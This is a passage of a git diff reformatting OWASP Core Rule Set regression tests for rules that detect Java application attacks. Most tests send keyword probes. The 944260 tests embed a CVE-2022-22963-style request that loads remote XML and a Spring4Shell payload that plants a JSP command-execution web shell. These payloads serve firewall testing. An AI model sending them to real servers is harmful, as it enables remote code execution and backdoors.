"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log: + expect_ids: [944250] + - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log: + expect_ids: [944250] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log: + expect_ids: [944250] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index 144d3f52a..d6a8d28e8 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -1,41 +1,39 @@ --- meta: author: "theMiddle, azurit" - enabled: true - name: "944260.yaml" - description: "Positive tests for rule 944260" +rule_id: 944260 tests: - - test_title: 944260-1 + - test_id: 1 desc: "CVE-2022-22963" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" - output: - log_contains: "id \"944260\"" - - test_title: 944260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log: + expect_ids: [944260] + - test_id: 2 desc: "Spring Framework RCE" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" - output: - log_contains: "id \"944260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log: + expect_ids: [944260] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 412a3b686..9ab732eb5 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -1,6697 +1,6605 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944300.yaml" - description: "Positive tests for rule 944300" +rule_id: 944300 tests: - - test_title: 944300-1 + - test_id: 1 desc: "Argument test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log: + expect_ids: [944300] + - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 